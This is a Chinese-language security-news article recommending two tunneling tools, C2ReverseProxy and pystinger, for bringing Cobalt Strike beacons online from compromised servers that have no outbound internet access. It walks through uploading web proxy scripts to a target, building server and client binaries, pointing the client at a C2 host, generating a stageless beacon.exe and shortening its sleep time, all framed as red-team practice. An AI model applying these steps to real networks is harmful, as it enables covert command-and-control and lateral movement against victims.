工具推荐之不出网环境下上线CS - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

工具推荐之不出网环境下上线CS

盛邦安全 行业 2023-07-21 15:03:14
56459
收藏

导语:工具推荐之不出网环境下上线CS

前言

在实战攻防演练中,我们经常会遇到目标不出网的情况,即便获取了目标权限也不方便在目标网络进行下一步横向移动。本期我们将会推荐两个常用的代理工具,使我们能在不出网的环境下让目标上线到CS,方便后渗透的工作。

工具1:DReverseServer

工具链接:

https://github.com/Daybr4ak/C2ReverseProxy

工具原理:

利用代理转发将目标服务器上的CS的流量特征转发到CS服务端上,类似模拟一个木马在本地Listener进行上线。

官方使用说明:

1、将C2script目录下的对应文件,如proxy.ashx 以及C2ReverseServer上传到目标服务器。

2、使用C2ReverseServer建立监听端口:

./C2ReverseServer  (默认为64535)

3、修改C2script目录下对应文件的PORT,与C2ReverseServer监听的端口一致。

4、本地或C2服务器上运行C2ReverseClint工具

./C2ReverseClint -t C2IP:C2ListenerPort -u http://example.com/proxy.php (传送到目标服务器上的proxy.php路径)

5、使用CobaltStrike建立本地Listener(127.0.0.1 64535)端口与C2ReverseServer建立的端口对应

6、使用建立的Listner生成可执行文件beacon.exe传至目标服务器运行

7、可以看到CobaltStrike上线。

QQ截图20230721141400.png

DReverseServer复现步骤

1、放置脚本文件到目标服务器

QQ截图20230721141418.png

2、编译服务端程序

在cmd命令行输入 CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build DReverseServer.go完成受害者端应用程序编译。

QQ截图20230721141612.png

3、编译CS端程序

在cmd命令行输入CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build DReverseClint.go完成CS端应用程序编译。

QQ截图20230721141636.png

4、生成stagerless木马

Staged 和 Stageless 的区别在于Staged实际功能只是程序执行后和C2 建立连接并接收真正的shellcode,然后加载执行(这里服务器不出网所以导致无法正常建立连接);而 Stageless 直接省去了接收 Payload 的步骤。

QQ截图20230721141704.png

5、目标客户端监听

QQ截图20230721141733.png

6、CS端监听

QQ截图20230721141802.png

7、等待上线

QQ截图20230721141829.png

8、注意事项

a) 本地复现php脚本需打开socket选项。


QQ截图20230721141912.png

b) 建议用户对CS的jar文件中的/resources/default.profile进行修改,将sleeptime值修改1000以下,这样CS生存的木马上线就不用默认等待60秒。

QQ截图20230721141939.png

工具2:pystinger

工具链接:

https://github.com/FunnyWolf/pystinger/

工具原理:

利用内网反向代理转发将目标服务器上的木马上线与连接、操作流量特征通过HTTP协议方式转发至C2服务端,使其目标在不出网情况下上线MSF、viper、CS。

官方使用说明:

详见https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

pystinger复现步骤

工具可分为2块内容:

1、stinger_server程序+proxy脚本。

2、stinger_client程序+木马程序

QQ截图20230721142027.png

1、放置脚本文件到目标服务器

访问下图页面代表成功。

QQ截图20230721142052.png



2、在目标机器运行stinger_server

QQ截图20230721142116.png

3、在CS端运行stinger_client

QQ截图20230721142139.png

4、生成木马

根据stinger_server反馈的Payload端口,在CS界面新增一个Listener,并使用这个Listener新生成一个恶意木马。

QQ截图20230721142205.png

我们通过命令界面能看到网络连接详情,最后愉快的开启内网渗透。

QQ截图20230721142248.png


如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2022 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务